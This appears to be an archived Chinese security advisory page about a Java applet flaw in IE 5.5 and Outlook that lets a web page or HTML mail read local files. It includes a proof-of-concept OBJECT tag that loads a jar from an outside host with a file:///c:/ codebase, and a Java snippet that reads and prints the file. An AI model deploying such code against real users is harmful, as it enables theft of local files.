9.html

写给JSP初级程序员的书

<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<meta name="description" content="Java,JDBC,EJB,Open Source,jdk,rmi">
<meta name="Keywords"
content="Java, servlets, Java servlet, Javascript, ActiveX, VRML,
        applet, applets, directory, news, jdbc, applications, 
        Java applications, Java developer, Java development, developer, 
        classes, Jars.com, Jars, intranet, Java applet, Javabeans, 
        Java products, JDK, Java development kit, java development environment, JIT,
        JavaPlan, enterprise tools, JVM, Java Virtual Machine, Java resources, 
        SUN, CGI, Perl, database, network, html,
        xml, dhtml, rating, ratings, review, jars, cgi, programming,
        software review, software rating">
<title>csdn_IE 5.5/Outlook java存在安全漏洞 </title>
<style>
.news {   BACKGROUND: #007cd3;  font-family: "宋体"; font-size: 9pt }
.t {  font-family: "宋体"; font-size: 9pt }
.t1 { color:#007cd3;  font-family: "宋体"; font-size: 9pt }
.white { font-family: "宋体"; font-size: 9pt;color:#FFFFFF }
.red { font-family: "宋体"; font-size: 9pt;color:#FF0000 }
A:visited {color:#0000FF}
A:hover {color: #ff6666; text-decoration: none}
.text {font-size: 12px; line-height: 160%; font-family: "宋体"}
.text1 {color:#000000; font-size: 12px; line-height: 130%; font-family: "宋体"; text-decoration: none}
.text1:visited {color:#000000}
.text1:hover {color: #000000}
.text2 {color:#000000; font-size: 12px; line-height: 130%; font-family: "宋体"; text-decoration: none}
.text2:visited {color:#000000}
.text2:hover {color: #000000}
.text3 {font-size: 12px; line-height: 100%; font-family: "宋体"; text-decoration: none}
.large {font-size: 14.8px; line-height: 130%}
</style>
</head>

<body


<!--start first table -->



  <tr>
    <td WIDTH="100%" VALIGN="TOP">
      <tr>
        <td WIDTH="100%" CLASS="white"></td>
      </tr>
    
      <tr>
        <td WIDTH="50%" bordercolor="#FFFFFF" CLASS="t1" bgcolor="#F0F0F0" align="center" nowrap>IE 5.5/Outlook java存在安全漏洞 </td>
        
      </tr>
      <tr>
        <td WIDTH="100%" bordercolor="#FFFFFF" CLASS="t" bgcolor="#F0F0F0" colspan="2">
        <pre>
        
涉及程序： 
IE 5.5/Outlook  
  
描述： 
IE 5.5/Outlook java存在安全漏洞 
  
详细： 
一个攻击者能通过一个指定的Java applet代码库，然后通过HTML邮件或网站提交给目标主机
能获得在远程系统上的读取权限。当用户在使用Microsoft Internet Explorer
 或Outlook/Outlook Express时，与一个jar文件相关联的applet程序运行。这样一个恶意
 的攻击者可以通过诱惑用户访问他自己创建的网页或HTML文件来打开用户的电子邮件或是了解到
 用户的URL。这样可以获得用户的敏感信息。



以下代码仅仅用来测试和研究这个漏洞，如果您将其用于不正当的途径请后果自负


javacodebase1.html
&lt;OBJECT CLASSID="JAVA:gjavacodebase.class" WIDTH=590> 
&lt;PARAM NAME="ARCHIVE" VALUE="http://www.guninski.com/gjavacodebase.jar"> 
&lt;PARAM NAME="CODEBASE" VALUE="file:///c:/"> 
&lt;PARAM NAME="URL" VALUE="file:///c:/test.txt"> 
&lt;/OBJECT> 

gjavacodebase.java
...... 
try 
  { 
    u = new URL(getParameter("URL")); 
    InputStream is=u.openStream(); 
    byte ba[]=new byte[1000]; 
    int l=is.read(ba); 
    InputStream os=u.openConnection().getInputStream(); 
    String s1=new String(ba,0,l); 


    print(u.toString()); 
    print(s1); 
  } 
....... 

受影响的系统：
Microsoft Windows 98
Microsoft Windows 95
Microsoft Windows NT 4.0
Microsoft Windows NT 2000 
  
解决方案： 
CNNS为您提供完善的网络安全服务。 


<pre>

        </td>
      </tr>
    </td>
  </tr>
</div>
</body>
</html>